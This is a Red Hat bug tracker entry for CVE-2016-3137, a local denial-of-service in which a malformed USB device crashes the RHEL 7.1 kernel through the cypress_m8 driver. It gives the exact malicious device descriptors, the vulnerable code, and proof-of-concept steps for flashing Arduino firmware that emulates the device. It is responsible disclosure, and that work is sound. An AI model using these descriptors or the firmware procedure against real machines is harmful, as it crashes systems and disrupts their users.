Bug 1283368 - CVE-2016-3137 Local RedHat Enterprise Linux DoS – RHEL 7.1 Kernel crashes on invalid USB device descriptors (cypress_m8 driver) [local-DoS]
CVE-2016-3137 Local RedHat Enterprise Linux DoS – RHEL 7.1 Kernel crashes on ...
Status: CLOSED WONTFIX
Product: Red Hat Enterprise Linux 7
Classification: Red Hat
Component: kernel (Show other bugs)
7.1
Unspecified Unspecified
unspecified Severity high
: rc
: 7.3
Assigned To: Don Zickus
Mike Gahagan
: Security, SecurityTracking
Depends On:
Blocks: CVE-2016-3137
  Show dependency treegraph
 
Reported: 2015-11-18 15:04 EST by Ralf Spenneberg
Modified: 2016-11-08 11:06 EST (History)
2 users (show)

See Also:
Fixed In Version:
Doc Type: Release Note
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2016-03-18 05:54:40 EDT
Type: Bug
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)
vUSBf Payload (148 bytes, text/plain)
2015-11-18 15:05 EST, Ralf Spenneberg
no flags Details
Stacktrace (5.79 KB, text/plain)
2015-11-18 15:07 EST, Ralf Spenneberg
no flags Details
Arduino firmware demonstrating the bug (16.68 KB, text/plain)
2015-11-18 15:08 EST, Ralf Spenneberg
no flags Details

  None (edit)
Description Ralf Spenneberg 2015-11-18 15:04:42 EST
Description of problem:
Local RedHat Enterprise Linux DoS – RHEL 7.1 Kernel crashes on invalid 
USB device descriptors (cypress_m8 driver) [local-DoS]

Version-Release number of selected component (if applicable):
Kernel-Version: 3.10.0-229.20.1.el7.x86_64 

How reproducible:
always


OpenSource Security Ralf Spenneberg
Am Bahnhof 3-5
48565 Steinfurt
info@os-s.net


Date: November 12th, 2015
Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
CVE: not yet assigned
CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 
Title: Local RedHat Enterprise Linux DoS – RHEL 7.1 Kernel crashes on invalid 
USB device descriptors (cypress_m8 driver) [local-DoS]
Severity: Critical. The Kernel panics. A reboot is required.
Ease of Exploitation: Trivial
Vulnerability type: Wrong input validation
Products: RHEL 7.1 including all updates
Kernel-Version: 3.10.0-229.20.1.el7.x86_64 
(for debugging-purposes we used the CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)


Abstract
The Kernel 3.10.0-229.20.1.el7.x86_64 crashes when presented a buggy USB 
device which requires the cypress_m8 driver.
Detailed product description
We confirmed the bug on the following system:
RHEL 7.1
Kernel = 3.10.0-229.20.1.el7.x86_64
Further products or kernel versions have not been tested.
How reproducible: Always
Actual results: Kernel crashes 

Description:
The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo 
(github.com/schumilo) using the following device descriptor:

 ######### PAYLOAD 1 #########
[*] Device-Descriptor
  bLength:		0x12
  bDescriptorType:	0x1
  bcdUSB:		0x200
  bDeviceClass:		0x3
  bDeviceSubClass:	0x0
  bDeviceProtocol:	0x0
  bMaxPacketSize:	0x40
  idVendor:		0x4b4
  idProduct:		0x5500
  bcdDevice:		0x100
  iManufacturer:	0x1
  iProduct:		0x2
  iSerialNumbers:	0x3
  bNumConfigurations:	0x1

This is the configuration descriptor containing only one interrupt-endpoint-descriptor (IN-direction).
The cypress_m8 driver assumes that there will be at least two endpoint-descriptors configured for interrupt-transfer and each used for one direction. 
Since there is no sanity check, it is possible that the kernel tries to dereference a null-pointer.
This results in a crash of the system. 

****
$ nm cypress_m8.ko.debug | grep cypress_generic_port_probe
00000000000008d0 t cypress_generic_port_probe
$ addr2line -e cypress_m8.ko.debug 0x9D0
/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_64/drivers/usb/serial/cypress_m8.c:488
****

**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/usb/serial/cypress_m8.c)
        ...
482	if (interval > 0) {
483		priv->write_urb_interval = interval;
484		priv->read_urb_interval = interval;
485		dev_dbg(&port->dev, "%s - read & write intervals forced to %d\n",
486			__func__, interval);
487	} else {
488		priv->write_urb_interval = port->interrupt_out_urb->interval; /* possible null-pointer dereference */
489		priv->read_urb_interval = port->interrupt_in_urb->interval; /* possible null-pointer dereference */
490		dev_dbg(&port->dev, "%s - intervals: read=%d write=%d\n",
491			__func__, priv->read_urb_interval,
492			priv->write_urb_interval);
493	}
        ...
****

	[*] Configuration-Descriptor
	  bLength:		0x9
	  bDescriptorType:	0x2
	  wTotalLength:		0x27
	  bNumInterfaces:	0x1
	  bConfigurationValue:	0x1
	  iConfiguration:	0x0
	  bmAttributes:		0x0
	  bMaxPower:		0x31
		[*] Interface-Descriptor
		  bLength:		0x9
		  bDescriptorType:	0x4
		  bInterfaceNumber:	0x0
		  bAlternateSetting:	0x0
		  bNumEndpoints:	0x3
		  bInterfaceClass:	0x0
		  bInterfaceSubClass:	0x0
		  bInterfaceProtocol:	0x0
			[*] Endpoint-Descriptor
			  bLength:		0x7
			  bDescriptorType:	0x5
			  bEndpointAddress:	0x81  <-- IN-Direction
			  bmAttribut:		0x3   <-- Interrupt-Transfer
			  wMaxPacketSize:	0x404
			  bInterval:		0xc
			[*] Endpoint-Descriptor
			  bLength:		0x7
			  bDescriptorType:	0x5
			  bEndpointAddress:	0x1   <-- OUT-Direction
			  bmAttribut:		0x2   <-- Bulk-Transfer
			  wMaxPacketSize:	0x4
			  bInterval:		0xc
			[*] Endpoint-Descriptor
			  bLength:		0x7
			  bDescriptorType:	0x5
			  bEndpointAddress:	0x82  <-- IN-Direction
			  bmAttribut:		0x1   <-- Bulk-Transfer
			  wMaxPacketSize:	0x4
			  bInterval:		0xc

Proof of Concept:
1) The bug can be reproduced using USB-fuzzing framework vUSBf from Sergej Schumilo (github.com/schumilo). 
The attached vUSBf-obj file contains the payload. Please let us know if you would like to use the Facedancer board. 
In such case, we could also provide a patched version of vUSBf which allows to reproduce vUSBf-Payloads using the Facedancer board.
2) For a proof of concept we are providing also an Arduino firmware file. Just flash it 
on Arduino Leonardo and plug it into any RHEL machine. The Arduino will 
emulate the defective USB device.

   avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U flash:w:binary.hex

The file binary.hex has been attached to this bug report.
To prevent automated sending of payloads, use a jumper to connect port D3 and 
5V!


Severity and Ease of Exploitation
The security weakness can be easily exploited. Using our Arduino firmware only 
physical access to the system is required. 


Additional info:
Stacktrace, vUSBf-Payload, Arduino-Firmware attached.


Please assign a CVE for this issue since this is a local DoS of the targeted system. 
CVSS 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Comment 1 Ralf Spenneberg 2015-11-18 15:05 EST
Created attachment 1096269 [details]
vUSBf Payload
Comment 2 Ralf Spenneberg 2015-11-18 15:07 EST
Created attachment 1096270 [details]
Stacktrace
Comment 3 Ralf Spenneberg 2015-11-18 15:08 EST
Created attachment 1096271 [details]
Arduino firmware demonstrating the bug
Comment 4 Adam Mariš 2016-03-09 11:27:32 EST
Public via:

http://seclists.org/bugtraq/2016/Mar/55
Comment 5 Vladis Dronov 2016-03-11 09:13:01 EST
CVEID was requested at: http://seclists.org/oss-sec/2016/q1/604
Comment 6 Vladis Dronov 2016-03-15 04:21:13 EDT
CVE-2016-3137 was assigned to this flaw, please, use it in the related communications, see http://seclists.org/oss-sec/2016/q1/621.
Comment 7 Vladis Dronov 2016-03-16 12:23:01 EDT
Patch was sent upstream for CVE-2016-3137, many thanks to Oliver Neukum:
http://marc.info/?l=linux-usb&m=145813816318926&w=2
Comment 8 Vladis Dronov 2016-03-18 05:54:40 EDT
Thank you for reporting this flaw. The Product Security has rated this flaw as having low security impact (bz#1316996), so the patch is currently not planned to be added to the RHEL source trees. If accepted to the upstream, the patch may get to the RHEL trees later at the next USB subsystem code rebase.

Note You need to log in before you can comment on or make changes to this bug.